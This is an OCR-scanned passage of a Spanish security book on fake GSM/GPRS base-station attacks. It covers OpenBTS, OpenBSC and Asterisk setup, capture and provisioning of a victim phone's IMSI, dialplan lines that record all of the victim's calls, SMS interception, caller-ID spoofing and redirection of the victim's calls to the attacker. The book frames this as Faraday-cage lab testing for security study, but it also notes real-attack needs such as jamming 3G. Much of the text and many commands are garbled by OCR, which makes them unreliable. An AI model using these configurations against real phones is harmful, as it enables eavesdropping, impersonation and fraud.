iptables 

iptables -F OUTPUT 

iptables -P OUTPUT AC 

iptables -F FORWARD 

iptables -P FORWARD ACCEPT 

ipzables -F PREROUTINC 

ipuables =P PEROU ING 
ables -F POSTROUT: 


P POSTROUTINS ACCEPT 
-F oyrəyr 
-P CUTPUT ACCES 


IP -orwarding 
> /prcc/sys/net/ipvá/ip_fozward 


# Enable MASQUERADE on Gi interfa 
iptables nat ~; ISTROUTING -o ezhC j MASQUERADE 


4 show final corfiguraticr 


seno 
acho “RRHERA TALLE FILTER PARRA 
iptables -n 


ERA 


iptables =n =b =y =t nat 

eebo SEHH EEIE ESEHERIER” 
ecko “” 

ecko “Dere.” 


Configuración del servicio GGSN (openggsn) 
El código fuente de OpenGGSN incluye un ejemplo de fichero de configuración (gesn.con/) en el 
«subdircelorio examples. 


Para establecer la configuración de OpenGGSN se puede copiar inicialmente ese fichero al directorio 
apropiado (por ejemplo /etc/opt/OpenGGSN?) y editar dicha copia para establecer la configuración 
descada. 


Los parámetros principales a configurar son la dirección IP en la que esci i el GGSN (listen). el 
rango de direcciones de red a asignar a los clientes GPRS ( |. y el servidor DNS a asignar a los 
clientes GPRS (peodrs 7). 


La siguiente salida del comando diff, comparando un fichero de configuración antes (.orig) y después 
de ser editado, muestran los cambios sugeridos sobre el fichero de configuración de ejemplo: 
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rootelabgsmd0:/ezc/op 
10010 
< Eg 


gsa.eonf-orig ggsn.conf 


> fg 
14c14 
< ldoba 


debug 
25 
< łpidfile /var/iunfugon. 


> pidfile /var/opt/ggsn/ggsn.pid 
30539 

< dstaezedir /var/lib/ggsn/ 

> statediz /var/cp 
35035 

< Pisten 
> listen 10.11.11.1 
40040 

< pret 192.168.0.0/24 


yyun/ 


0..3.13.0/24 


€ tdynip 192.168.0.0/24 
> dynip 10.13.13,0/24 
67067 

< fpzodnsl 0.0.0.0 


> pecdnsl 1 
voLdlabgam 


etc/opt/ggent 


Configuración del servicio SGSN (osmo-sgsn) 
OpenB8C incluye un ejemplo de fichero de configuración para osmo-sgsn, que se instala como /opt/ 
OpenBSC/hare/doc/OpenBSC/examplesfosmo-sgsn/osmo-sgsn.cfa. 


Para establecer la configuración de osmo-sgsn se puede copiar inicialmente ese fichero al directorio 
apropiado (por ejemplo /eíc/op/OpenBSC?) y editar dicha copia para establecer la configuración 
deseada. 


La siguiente salida del comando diff, comparando un fichero de configuración antes (.orig) y después 
de ser editado, muestran los cambios sugeridos sobre el fichero de configuración de ejemplo: 
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rontflabgsmC0;/etc/opt 
La entrada “gtp local-ip” es la dirección 1P local en la que escucharáasmo-sgsn. 
Ta entrada “ggsn 0 remote-ip” es la dirección IP del GGSN, a la cual se conectará osmo-sgsn. 


Las dos direcciones IP. la del SGSN y la del GGSN, deben ser distintas incluso si ambos procesos 
se ejecutan en el mismo equipo. 


Tas entradas “encapsulation” deben especificar la dirección IP y puerto del SGSN tal cual serán 
vistos desde la BTS. Puede coincidir con la IP especificada en “gtp local-ip” si no hay NAT entre la 
BTS y el SGSN. 


Configuración del servicio BSC (openbsc: osmo-nitb) 
OpenBSC incluye varios ejemplos de ficheros de configuración para los distintos modos de operación 
de OpenBSC, que se instalan bajo /opt/OpenBSC/share/doc/OpenBSC/examples. 


Para establecer la configuración de OpenBSC (osmo-nitb) se puede copiar inicialmente el fichero 
OpenBSC.ct3 correspondiente al modo de funcionamiento osmo-nith con BTS nanoBTS, /opt/ 
OpenBSChhare/doc/OpenBSC/examples/osmo-nitb/nanoBTS/OpenBSC.cfg, al directorio apropiado 
(por ejemplo /etc/opt/OpenBSC) y editar dicha copia para establecer la configuración deseada. Los 
principales parámetros que se recomienda modificar (algunos es imprescindible hacerlo) son: 


Parámetro Descripción 
short name Nombre corto que publicará la celda 
long name — Nombre largo que publicará la celda 
Sid 3 Banda en la que trabajará la nanoBTS. Debe ser GSM900 o 
DCS1800, y debe reflejar la banda de la nanoBTS utilizada. 
ip.access unit id Identificador asignado a la nano 81'S durante su inicialización 
Conjunto de parámetros que definen la configuración GPRS 
gprs e de la nanoBTS. A continuación se explican algunos con más 
detalle, 
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Parámetro Descripción 


gprs mode egprs Activa el modo Edge. 


Selecciona el puerto UDP que utilizará la nanoRTS para 


EA | comunicarse con el SGSN. Enveste caso 23000. 


eS 


gprs nsvc O remote udp port 23011. Puerto UDP del servicio SGSN de cara a la nanoBTS. En 


este ejemplo 23011. 


Dirceción TP del servicio SGSN de cara a la nanoB TS, En 


gprs nsve 0 remote ip 10.10.10. KA este ejemplo, 10.10.10.11. 


an ARFCN en el que emitirá la nanoBTS. 


El valor PDCI en lugar de TCH/F indica que ese time slot 
se dedicará a tráfico GPRS en lugar de tráfico de voz. Se 
recomienda dedicar varios time slots a tráfico GPRS. 


phys_chan_config PDCI 


La siguiente salida del comando diff, comparando un fichero de configuración antes (.orig) y después 
de ser editado, muestran los cambios sugeridos sobre el fichero de configuración de ejemplo: 


rcozdlangsn00:/etc/opt/openteucé di 
openbsc.cfg.o: [times=amp! 


—rupN openbsc.cfg.orig sperbso.cfg 


+++ cpenbse.clg|Linestamp] 
Aa -11,3 +11,8 02 e_irput 
network 


relwork upualry code 1 
mobile netwer< code 
short name OpenB3C 
-ong name Open25C 
short rame tastsher 
long name tes 
aui polis 
location updatirq rojocl cause 13 
encryption a5 0 
Ca -39,6 +39,8 (8 network 

timer t3141 9 

bts C 


ra 


priate band (GSM900, DCS1000) 


iden 
locaticn_azea_code 1 

VE -50,11 +52,22 Qu 
channel a losal 


Hacking de dispositivos iOS: iPhone & iPad 


rach tx integer 9 
rach max trarsmission 7 
id 1891 9 


(2C01=G5M90C, 2002: 


51809) 


- ip.aesess anit_id 2002 
- ip.access uniz id 2091 9 
oml ip.access stream id 255 line 0 


- gprs mode nere sN 

- gprs mode egprs 

gprs routing area 0 

bvci 2 

191 

0 nsvei 102 
0 local udp port 23000 

> 0 remote nép port 23011 
0 remote ip 10.1C0.10.11 


-  IXXxX- Select ARTCN. Note: 


1 ARFCNs 9IOMHZ: 1-124 (e.g. 5) 
+ Lo ARFCNS 1800M -RES q 514) 

aržcn 514 

nominal power 23 


_power_red 20 

RA -63,19 182,10 A network 
timeslot 3 
phys_chan_config 'GH/F 


timeslot 4 
- phys_chan config TCH/F 
+ phys_chan_ Poca 
timeslot 5 
- T TCH/F 
- phys_chan_config PUCH 
timeslct € 
- phys_chan_ccntig TCH/F 
+ phys_chan config #LCA 
timeslct 7 
phys chan config TCI/F 
+ phys_chan_conlig POCA 
roct0labgsmd0: /erc/opt/operbsci 4 


Provisionamiento de usuarios 


El provisionamiento de usuarios, es s decir, configurar qué usuarios (IMST) móviles podrán concelarse 
y cuáles n no, se describe más adelante, en la sección dedicada a la manipulación de comunicaciones 
GPRS/Edge. 
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3. Manipulación de comunicaciones GSM (voz y 
SMS) 


\ 
Preparación de la infraestructura para pruebas de ataque con 
estación base falsa 


Una vez instalada la infraestructura descrita anteriormente, el siguiente paso es poner en marcha el 
ataque con estación base falsa GSM, del que se supone al lector conocimientos de cómo funciona’”. 


Para poder exponer ejemplos c concretos, supóngase que la infraestructura configurada está basada en 
OpenB IS 2.8 + USRP (cualquier modelo soportado) con ? tarjetas hija configuradas para emitir en 
la banda de 900 MHz + Asterisk (Real Time)". Se supone que la USRP está correctamente instalada 
y configurada cn este punto, así como cl sofware OpenBTS, Asterisk y sus configuraciones correctas 
para funcionar juntos, todo ello siguiendo las instrucciones que se han aportado en las referencias. 


Por claridad en la exposición de los conceptos, las configuraciones presentadas son las mínimas 
necesarias para que funcionen las pruebas de concepto de los ataques y no se ha incluido contenido 
que haría más. estable la infraestructura, como por ejemplo: 

- Respuesta ante extensiones no existentes. 

- Automatización en la configuración de OpenBTS. 


- Unificación en la configuración de Asrerisk de forma que todos los ataques cstón 
implementados y se activen/desactiven mediante un mecanismo sencillo. 


- Automatización en la configuración de Asterisk. 


Conexión de la estación base a la jaula 

La conexión de la estación base a la juula se realizará mediante cables RF a los conectores blindados 
(típicamente del tipo SMA) de la jaula. En el interior de la jaula, esos conectores deberán estar 
conectados a una antena cada uno, cuyo único requisito será que tenga la misma impedancia que la 
USRP (50 Q). Se ubicará el terminal víctima dentro de la jaula y se cerrará la jaula. 


Preparación previa de asterisk 
Partiendo de la configuración básica (sip.conf y extensions.comf) suministrada von OpenBTS 2.8 
(en el directorio Asterisk config) se construirá una configuración de Asterisk con los siguientes 
objetivos”: 

- Minimizar las diferencias de configuración para OpenBTS 2.6 y OpenBTS 2.8. 


17 hups://wwwdefcon orgihimi/links/de arcinvesíde 18-archive.htimikPaget 


18 Aunque suponemos una infraestructura concreta del atacante, todos los ataques funcionarian de forma análoga con otras 
versiones de la infraestructura simplemente cambiando ulgunos procedimientos de configuración. 


19 Se presupone al lector conocimientos básicos de configuración de Asterisk. 
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- Hacer que la construcción de la configuración guíe al lector para entender los objetivos 
de cada paso. 


- — Simplificaral máximo la configuración incluyendo solo aquellos elementos imprescindibles 
para realizar las demostraciones de los ataques. 


Tnstalación de un teléfono de ataque 1 

Para que el atacante pueda disponer de teléfonos con los que comunicar por GSM es necesario tener 

teléfonos registrados en su infraestructura. Existen 2 modos de hacerlo: 
-Teléfonos GSM registrados cn la estación base (en el caso de las pruebas de concepto 
deberían estar dentro, o bien tener su antena dentro de la jaula de Faraday). 
- Teléfonos Sip registrados en el Asterisk de anida duda la opción 
más cómoda para el oa El teléfono Sip puede configurarse en el mismo PC donde corre 
el resto de la infraestructura o bien en un PC distinto que tenga conectividad IP con cse PC 
(que es donde está corriendo Asterisk). 


Se supone que en la prueba se dispone de un teléfono Sip registrado en el Asterisk de la infraestructura, 
con la extensión asignada 20012%. 


Para provisionar este tipo de teléfonos en Asterisk, este debe disponer de uma entrada como csta en 
el fichero de configuración sip.conf de Asterisk: 


peguz 9 


“Softpkone 2001” <2091> 
type=friend 

conlexl-s p- otal 

host-dynanic 

aecrez=1224 


Y posteriormente releer la configuración sip desde Asterisk, mediante la ejecución del siguiente 
comando en la consola de Asterisk: 


SS 
En cl dialplan (extensions.conf) se deberá crear un contexto como el que sigue™: 


Isoftphones] ` 
Balon => 2XXX,1,An 
exzen => Toxxx, ny S1a1 (SI2/$ (EXTEN), 30) * - 


Y modificar el contexto [sip-external] para que incluya ese nuevo contexto: 


Isip-external] 
i This is the top-lev 
+ also intlucos ths 


to vul-ol-nelwers calling. 


1 context that gi 
aslwork calling. 


20 Asumimos al lector la capacidad para configurar un teléfono SIP para ser registrado en el asterisk de la infraestructura, 
Como ejemplo, podria utilizarse linphone (hiip:-/vww voip- info org/wiki/viewiAsterisk-phane+linphone) 


21 Vamos a suponer a aaa son alcanzables y que les asignaremos siempre 
“una extensión de la forma 3 Este comportamiento se escoge por comodidad en las pruebus de conceplo de lus ata 
y es sustituible por cualquier otro que al lector le parezca adecuado- 
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include => scf=phones = 
include => outbound--runk + 


\, Acontinuación, se debe recargar el dialplan en Asterisk, mediante la ejecución del siguiente comando 
Men la consolerde Asterisk: 


dialplan reload 


Tras lo cual se podrá comprobar el correcto funcionamiento del sofiphone de ataque llamando a la 
extensión 2600 (función de echo predefinida en el dialplan). 


Enrutamiento de llamadas hacia el exterior 
Para disponer de esta funcionalidad y permitir que los teléfonos registrados en la infraestructura del 
atacante puedan cursar llamadas al exterior a través de un proveedor de voz sobre IP, se debe incluir 
una entrada similar a la siguiente en el fichero de configuración sip.conf de Asterisk: 
[VOIPProvidex] 
type=friend 
secret=123056 į Password 
defaultuser=username ; User Name 
host=sip.provider.com + VOIP Provider hostname 
insecure=port, invite ; Defaull security so-tings. 
5 Security will depend on 
províder's capabilities 


En la que sip.provider.com representa la dirección del servidor sip de nuestro proveedor (con el que 
se tiene que tener contratado este tipo de servicio) y el usuario y el password para la conexión se 
configuran mediante los parámetros defaultuser y secret. 


Posteriormente se debe recargar la configuración sip: 
sip reload * 


Adicionalmente, en la sección ourbound- trunk del dialplan (/etc/Asterisk/extensions. conf), se deben 
incluir las siguientes líneas: 

exten => _ 95 XXXXXXXX, n, Answer (). 

exten => _[96] XKXXXXXK; n, Dial (SIP/VOIPFrovider/0034$(ZXTEN), 30) 


y recargar el dialplan en la consola de Asterisk mediante el comando: 
dialplan reload" - 


Se probará que el enrutamiento funciona llamando desde el sofiphone de ataque a cualquier número 
nacional. 


Nota: En esta configuración se utilizará el enrutamiento exterior para todos aquellos 
números que tengan un formato compatible con el plan de numeración español. Ha- 


brá que modificar el dialplan si se quiere que se utilice para otro tipo de llamadas 
(internacionales, etcétera). 
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ota: Para identificar esta configuración como punto de partida del dialplan se hará 


referencia a ella como “dialpla 


Configuración de macro para llamadas entre terminales registrado en la estación base 
falsa 
Esta macro se configurará en el dialplan (/etc/extensions.conf), a continuación de la sección [globals]. 


OpenBTS 2.6 
[macro-DialG5M] 
exten => s,1,Dia- (SIP/S[ARGI]) 


OpenB15 2.8 

[ma cro-DialGS!] 
exten -> 5,1, Ser (Name-$(00DBC_5QL(selecz dial from dualsata table where exten = 
A "H(MACRO EXTEN) \”).}) 

exten => 9,n,Cotolt($[“$[Name]” = “”] Puip-oxlerral, $IMACRO_EXTEN], 1) 

exten -> sn Set (1Paddr-5[008C_SQL (select jPaddr from sip buddies where nane = 
A$ {xeme} 0D) 

exten => tyne BoLoTL ($$ I Pudder" — * 
exten => s,n,Dial (5IP/${Name}@S [IPadār 


2aip-external , $ (MACAD_SXTEN), 1) 
:5062) 


Registro del terminal / dispositivo víctima 


Para comenzar a emitir, debe configurarse la estación base con los siguientes parámetros de 
configuración (se adjuntan solo los mínimamente necesarios): 


La configuración inicial puede realizarse mediante el acceso a la base de datos de configuración de 
OpenBTS (por ejemplo mediante “SOLite3 /etc/OpenBTS/OpenBTS.db”), ya que el otro método 
de configuración de la paramctrización de OpenBTS (OpenBTSCLI) requiere que OpenBTS esté 
arrancado. El comando a ejecutar para modificar un parámetros sería este: “update CONFIG set 
WALUESTRING “<Nuevo_Valor>" where KEYSTRING - “<Nombre_Paramewo_Confs”” 


Parámetro de configuración | Valor Explicación 


GSMRadio.Band 900 Debe coincidir con la banda en la que emiten lag 
tarjetas hija. 


Este valor es el ARFCN de emisión de la celda, 

Puede encontrarse una lista de ARFCNs válidos 

(DOWNLINK) en: https://gsm.ks.uni-freiburg.del 

GSM.Radio.CO 51 arfen.php y en: http: //mww.telecomabe.com/a/arfen, 
html. 


Como la ejecución será dentro de la jaula de Faraday, 
puede configurarse cualquier valor de ARFCN válido] 
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Parámetro de configuración lor Explicación 
Código del país del operador que emite la SIMI 
= Š é instalada en el terminal victima (un listado de MCCS 
oidos oeg puede encontrarse aqui: http:/en. Wikipedia. org/wiki 
Mobile_Network_Code) 
Código del operador de telecomunicaciones que emitel 
r Pe la SIM instalada en el terminal víctima (un listado del 
GSM IAEATEMNC NN MNCs puede encontrarse aquí: http://en. Wikipedia. 
orgiwiki/Mobile Network Code). 
GSM Idemtitv.ShoriName NUILL Para que la red no mande el nombre además del 
código de red. 
GSM. Identity.ShowCountry NULL Para que no se muestre el código de país. 
GSM.Ruedio. PowerWManager. 30 Máxima atenuación. Ta potencia necesaria para 
MaxáttenDB emitir dentro de la jaula será típicamente baja. 
GSM.Radio.PowerManager. 15 Mínima atenuación. La potencia necesaria para emitir 
MinAnenDRB ii | dentro de la jaula será típicamente baja. 
Control. LUR.QueryClassmark 1 Servirá para identificar las capacidades del terminal. 


Control. LUR Query! MEI 


Servirá para ublener las capacidades del terminal. 


Control.LUR. 
UnprovisionedRejeciCause 


Se recomienda 0 para que el terminal siga intentando] 
cl registro indefinidamente tras un rechazo. El 
comportamiento de la mayoria de los móviles antel 
rechazo con código ( es que realizan 3 intentos del 
registro seguidos cada T3212 minutos. Para mág 
información se puede ver: htip:/wvwwtaddong, 
com/docs/RootedCon2012-Nuevos escenarios de | 
ataque GSM_GPRS.paf. 


GSM. Timer. 13212 


Minutos entre registros periódicos. 6 es el minimi 
permitido. 


Nota: En un ataque real, el atacante debería conocer más datos del entorno de radio 
del terminal víctima, „para lo cual debería scr capaz de capturar el beacon de la celda 
que le da servicio y configurar la estación base de acuerdo con la información obteni- 
da. Además, la estación base deberá competir en potencia con las celdas del entorno 
del atacante y muy probablemente deshabilitar las comunicaciones 3G del terminal 
victima (por ejemplo, utilizando un inhibidor). El atacante puede conseguir salvar 
eslas circunstancias. en cuyo caso los entornos real y de prucbas son prácticamente 
equivalentes.. 


w 
3 
ES 
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Existen varias formas de averiguar el IMST del termina víctima al que se tenga acceso fisico” , sin 
embargo se utilizará aquí la propia infraestructura para averiguarlo. 


Una vez configurados los parámetros, es posible comenzar a emitir arrancando Openii75 y esperar 
a que el terminal victima intente el registro en nuestra red. Ya que el terminal víctima no está 


ay) en Asterisk, el registro será rechazado. 


Una manera cómoda de averiguar el IMSI es buscarlo en los logs de OpenBTS (buscando la cadena 
“registration FAILED”). 


En este momento, se puede provisionar el terminal víctima asignándole la extensión 1001 (que se ha 
elegido arbitrariamente) al IMSI XXXXXXXXXXXXXXX que se ha visto en el rechazo. 


Provisión en OpenBTS 2.6 
En OpenBTS el provisionamiento de un terminal GSM se realiza mediante la adición de las siguientes 
lineas (como mínimo) al fichero sip.conf existente*: 


LIMSIXXXXXXXXXXXXAXX] 
callerid=-007 n 


context=sip-local 
alicwgsm 
host=dynamic 


A continuación, se ejecutará el siguiente comando en la consola de Asterisk: 
sip reload 


Adicionalmente, en el contexto [phones] del dialplan se deberán configurar las siguientes líneas: 
; Dial to user 1002 

exter <> [00 ,1,No0p(Gsl' Lo SIP, 
exter => 1002,n,Macro (dialG5M, IMSI 


Tras recargar el dialplan (dialplan reload), se puede esperar al siguiente registro del terminal. 


Cuando el siguiente registro se luzca, este debería ser aceptado y se vería el correspondiente 
mensaje en la consola de Asterisk. Para obtener más información del terminal y asegurarse de que 
se tiene comunicación con él, se puede ejecutar desde la consola OpenBTSCLEI el siguiente comando 
para mostrar tabla de TMSIS asignados al IMSI (debería aparecer también el ILMLI del terminal): 


tasts $ 


22 hitp:¿grauradio.orgiredmnine/projectsfgmeradiofwiki/OpenBTSSciting UpAsterisk 
23 Tista configuración debe realizarse por cada terminal configurado 
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Y para verificar que se tiene comunicación con el dispositivo: 


sendsrs XXXXKXXXXKXXXXX 0000 
Mensaje de prusba. 


Cuando al mensaje llega al terminal, se está seguros de que el terminal cs accesible vía su interfaz de 
radio. Una forma de verificar definitivamente que cl ataque con estación base falsa ha funcionado (y 
por tanto se pueden realizar todas las manipulaciones sobre las comunicaciones GSM del terminal 
que se explican a continuación), es realizar una llamada contra ćl desde un sofiphone configurado 
(marcando la extensión asignada al terminal móvil 1001). Si la llamada se establece. la configuración 
es correcta y se podrán rvälizar las pruebas posteriores. 


Provisión en OpenBTS 2.8 
Para provisionar un terminal en OpenBTS 2.8 hay que darlo de alta en la base de datos de sipauthserve. 
Las columnas significativas de esla base de datos son?! 


Columnas de la tabla dialdata_tahle: 


exter | La extensión a asignar al IMSI. 
dial | El IMST a provisionar, en formato “IMSIXXXXXXXXXXXXXX", 


Columnasde la tabla sip_buddies 

name | LLIMSL a provisionar, en formato “IMSTXXXXXXXXXXXXXX 
username | El IMSI a provisionar, en formato “IMSIXXXXXXXXXXXXXX”. 

type “friend”. 
El context del dialplan para este usuario (el configurado en el dialplan que se] 
suministra con OpenB1S es “phones”). 


context 


host “dynamic” es el valor recomendado para la configuración propuesta. 
callerid | Ll identificador de llamada para este terminal 
canreinvite “no” (recomendado para OpenBTS 2.8). 
allow | “gsm”. 
dimpmode | “info”. 


La dirección TP del host donde se registra el teléfono. Actualizado por sipauthserve] 
En el caso de la configuración propuesta será 127.0.0.1. 


ipaddr 


Así, al utilizar SQLire3 para acceder a las bases de datos de configuración citadas, los comandos a 
ejecutar serian: 


I XXXXX: 
©, Lype, vonlext, host, callerid, 
ZXXXXXXXXXX” ;“LMSTXXXXKXXKXZXXXX”, 
#71001“, "no", “gan”, “info”, "127.0.0.1*) 


"ementby.comdavid-burgess-S/openbts-28-provistoning. him! 
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Las verificaciones del registro se pueden realizar de forma idéntica a como se ha explicado para la 
versión 2.6. 


Nota: A partir de este momento todas las manipulaciones sobre las comunicaciones 
de la victima no dependen ya de OpenBTS, sino que se manejan (casi totalmente) des- 
de Asterisk. La configuración de Asterisk que se presenta en los siguientes ejemplos 


está pensada para ser lo más sencilla e ilustrativa posible. Sin embargo, una configu- 
ración avanzada de Asterisk permitiria configurar toda la funcionalidad presentada de 
una forma más completa, automatizada y operable. 


Interceptación de comunicaciones de voz 
Las comunicaciones de voz pueden ser fácilmente interceptadas desde Asterisk. 


Se presenta a continuación una posible configuración de Asterisk para interceptar todas las 
comunicaciones que el teléfono víctima (a quien se le ha asignado la extensión 1001) establezca con l 
cualquier dispositivo (tanto como origen como destino de llamada). Para ello, se deberán modificar 
el contexto [phones] del dialplan) añadiendo al inicio del mismo las siguientes líncas (antes de la 
llamada a la macro DialGSM): EN 


[phores] 

exter => N.,1,GotoIf($[S[(CALLERID (num)? != 1001] ?rorec£from) 
exter -> N. n Answer () 

exter => _N.,r,MixMonitor (/tmp/Re: 
$M) 1.gam) 

exter > _N.pn Gota (norecLa) 
exten => N., n Answer () 

exter => _N.,ninorecfrom),GotoIf{S[$IEXTEN) != 1001] ?norecto) 

exter -> _N. n, MixMoni tor (/Lmp/Rec_T IS ISTRETIME (, , 2YémécsH4M) > gun) 
exter => N.,ninorecio),No0p (); 


rom_5(CALLERID(rum) )_$ (STRFTIME (, ¿$Y2m4d4k 


Posteriormente se debe recargar el dialplan en Asterisk (cia2plan reload). 


Esta configuración hará que Asterisk grabe cualquier conversación a y desde el teléfono víctima a 
cualquier número real en un ficherocon el formato /mp/Rec_(From/Toj_1001_Y Y YYMMDDhhmm. 
gsm) que luego se podrá escuchar con (por ejemplo) la utilidad play. 


Nota: La interceptación de comunicación puede hacerse de muchas formas, y la con- 
figuración anterior es solo una muestra de ello. Es posible configurar la grabación 
a/desde determinados números. cn determinadas franjas horarias, cle. En gencral, 


Asterisk es lo suficientemente completo como para proporcionar toda la flexibilidad 
necesaria en este sentido. 
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Interceptación de mensajes SMS 


Infraestructura basada en OpenBTS 2.6 

Para poder activar la intercepción de mensajes es necesario asegurarse de que las siguientes líncas 
tengan los siguientes valores en el fichero de configuración de smqueue (smquene.config): 

4 Logging level 


Log.level DEBUC 
Log.evel smcommands.cpo INRUS 


Si se mantienen las opciones por defecto (no se configura fichero de log) cualquier mensaje enviado 
desde el terminal víctima a otro dispositivo aparecerá en el terminal donde se ha arrancado smqueue, 
con un contenido similar al presentado a continuación: 

Via: SIP/2.9/UDP 127.0.0.1:5062;branch=z9hCc4bX43203 

Era: TMRTXXXXKXXKXKXXXKX Cu dps IMSIKXXXXXXXXXXXXKXŁLZT. 0, 9, 1>7zagercjog 
<sip:9111111:18127.0.0.1> 


USec: 163 MUSSAGK 

Content-Type: text/plain 

Max-Forwards: 70 

Content-1angth: 3 
A 


SMS de prueba 


Infraestructura basada en OpenBTS 2.8 

El módulo de smqueue OpenBTS 2.8, por defecto guarda los mensajes de log haciendo uso del syslog 
del sistema. Por lo que cualquicr mensaje enviado desde el terminal víctima quedará registrado en el 
mismo, La línea que muestra el contenido del mensaje tiene un aspecto similar al que sigue: 


Sep 9 17:43:57 ZAPTOPOL smquene: INFG 3078002812 smauere.cppr1405rbandle_siorl_ 
code: Short code SMS smsc with “SMS de prueba” 


Ataques basados en la suplantación del número llamante 

De nueyo se utilizará Asterisk para la suplantación del número lamante. Imagínese que se quiere 
que cuando se llame desde el teléfono de ataque al teléfono víctima, este reciba la llamada con 
identificador de número llamante 911111111. Una posible configuración de Asterisk para conseguirlo 
podria consistir en cambiar el código llamante del teléfono de ataque mediante, por ejemplo, la 
adición de la siguiente línea al inicio del contexto [phones]: 

exten => _N.,1,ExecIf ($ [CALLERID (num) = 2002] 2Set (CALLERID (num) -=911111111)) 


y recargar el dialplan en la consola de Asterisk mediante el comando: 


dialplan reload 


De esta forma se consigue que cada vez que el teléfono Sip de ataque llame al teléfono víctima el 
identificador del número llamante sea el que se ha puesto como ejemplo: 911111111. 
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Nota: Esta prueba sirve para ilustrar que la creencia popular de que el número lla- 
mante es suficientemente válido para autenticar a quien origina la llamada no es cier- 
ta. Debido a esta creencia además pueden prosperar otro tipo de ataques de ingeniería 


social en los que el disponer del número llamante adecuado puede suponer una ven- 
taja. 


En el caso de los SMS, la suplantación del número llamante es trivial y no se necesita de una 
infraestructura con estación base para hacerlo. Si se quisiera suplantar al número 911111111 al enviar 
un SMS al teléfono víctima utilizando una infraestructura, se podría hacer simplemente ejecutando 
el siguiente comando en la consola de OpenBTS: 

sendsms IMSIXXXXXXXXXXXXXK 912111111 “Texto SMS a enviar” ' 


Ataques basados en la redirección del número destino 


Se puede también mediante configuración de Asterisk, redirigir cualquier llamada efectuada desde 
el móvil víctima, por ejemplo, hacia el teléfono del atacante. Para ello, una posible configuración 
sería añadir la siguiente línea antes de la invocación a la macro DialGSM en el contexto [phones] 
del dialplan: 


Xen N., n, CoLoT£($/CALLERID (nus) =2401 £ 5 EXTEN =911111111/ 23ip-lo- 
eal,2001,2) 


Y se puede probar que la redirección finciona tras recargar el dialplan en Asterisk. 


Nota: Esta prueba sirve para ilustrar que la creencia de que autenticar el destino de la 
llamada por el hecho de llamar nosotros es falsa. Un atacante podría utilizar esto para, 


por ejemplo, suplantar a un operador de una entidad bancaria, 


4. Manipulación de comunicaciones GPRS/EDGE 


Preparación de la infraestructura para pruebas de ataque con 
estación base falsa 


Conexión de los distintos elementos de la infraestructura 


Antes de iniciar una prueba de ataque con estación base falsa GPRS/Edge, será necesario conectar 
todos los elementos involucrados, como se describió anteriormente y como se muestra cn la siguiente 
figura, aquí reproducida de nuevo para comodidad del lector. 
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uno cuu 


Equipo Opentsc Equipo de manipulación de 
tráfico 


Imagen 12.04: Componentes de una infraestructura basuda en OpenBSC. 


Esta configuración del laboratorio sirve para simular, en un entorno controlado, el escenario de 
ataque real que se muestra en la siguiente figura: 


INTERNET 


Ipaccans nanoðT3 103CU 
th OPRSEDGE 


Imagen 12.05: Escenario de ataque simulado en el laboratorio. 


Prueba de conexión a Internet desde el PC de manipulación 
Dado que la salida a Internet del resto del laboratorio pasa por el equipo de manipulación, lo primero 
será comprobar que este equipo tiene acceso a Internet, sea por la vía que sca: 3G, ADSI., LAN, etc. 


Se recomienda probar tanto la conectividad IP como el acceso al servicio DNS. Ambas cosas se 
pueden probar conjuntamente comprobando que se recibe respuesta ejecutando ping en el equipo 
de manipulación: 


pias mww.gosgls.com 
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Prueba de conexión a Internet desde el PC de OpenBSC 

A continuación, será conveniente verificar que el equipo OpenBSC también tiene acceso a Internet 
a través del equipo de manipulación. La conectividad se puede verificar igual que antes, pero 
ejecutando el comando en el equipo OpenBSC: 


pirg www.gcogle.com 


Además, será conveniente verificar que en la tabla de rutas del equipo OpenBSC está declarado 
como rouler por defecto (0.0.0.0) el equipo de manipulación, y que como servidor de nombres está 
declarado el equipo de manipulación. Los siguientes comandos pueden ayudar a comprobar estos 
puntos: 


relsal =en 
cat /etc/resolv.conf 


Arranque del software relacionado con OpenBSC 


Nota: Antes de arrancar los programas relacionados con OpenBSC como se describe 
a continuación, será necesario contigurarlos correctamente. Al menos debería revi 
sarse antes de cada prueba que cl MCC y MNC configurados en OpenBSC.cfe son 
los descados para cada caso. El resto de parámetros es probable que una vez con- 
figurados no sea necesario modificarlos para cada prucba, pero aun así puede ser 
conveniente repasarlos. 


Los elementos software a arrancar en el equipo OpenBSC, aparte del propio sistema operativo con 
su configuración de tarjetas y rutas de red, son: 


iptables 
Como minimo se debe habilitar rowing: 


echo “1” > /proc/syu/1e-/ipva/tp forward 


GGSN 
Arrancar OpenGGSN: 


/opt/sgsn/fbin/ggen -e /eto/opl/ggst/ggsa.ccnf 


SGSN 
Arrancar OsmoSGSN: 


/opt/openbss/bin/osto-sgsa -c /ete/opt/ovendse/osno-sgan.- cfg 


Para obtener información de logging y poder ejecutar diversos comandos de control sobre 
OsmoSGS5N, establecer una sesión TELNET con el puerto 4245 del localhost: 


telret localhost 4215 $ 
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Por ejemplo, para obtener información del nivel MM (Mobility Management), que es el que muestra 
mensajes informativos durante el registro de los terminales, ejecutar lo siguiente en la sesión de 
TELNEK 

enable 
logg.1g 
logging filter all 1 
logging level mm debug 


OpenBSC 
Arrancar OpenBSC: 


/opt/openose/bir/ 


c-nlib -e /cle/op./openzac/openk 


-1 /var/opz/openssc/hlr. 


Para obtener información de logging y poder ejecutar diversos comandos de control sobre OpenBSC, 
establecer una sesión TELNET con el puerto 4242 del localhost: 


telnet lccalkost 4242 


Por ejemplo, para obtener información del nivel MM (Mobility Management), que es el que muestra 
mensajes informativos durante el registro de los terminales, ejecutar lo siguiente en la sesión de 
TELNET: 


anable 


Registro del terminal/dispositivo víctima (provisionamiento la primera vez) 
Para que un determinado dispositivo móvil pueda obtener servicio de la estación base falsa, su IMSL 
deberá haber sido provisionado en el HLR, que no es más que una sencilla base de datos en formato 
SQOLite3, contenida en un único fichero. Aunque podría provisionarse completamente a priori, la 
manera más sencilla de realizar la provisión es la siguiente. Primero, intentar una vez, antes de 
realizar la provisión. registrar el móvil en la estación base falsa. Esto puede hacerse o bien emitiendo 
con la identidad (MCC/MNC) del operador real del móvil, en cuyo caso el móvil intentará el registro 
automáticamente tras un cierto tiempo, o bien con otra identidad (MCC/MNC), y entonces será 
necesario forzar el intento de registro eligiendo selección manual del operador y seleccionando el 
operador correspondiente a la estación base falsa. Ese intento de registro fallará, ya que el IMSI no 
está todavía provisionado. pero OpenBSC habrá registrado el intento cn el HLR y habrá creado la 
fila adecuada en la tabla “subscriber”, con algunos valores por defecto, y. lo que es más importante, 
con el campo IMST relleno. A continuación, editar esa fila en concreto, cambiando el valor de la 
columna “authorized” a “1%: 
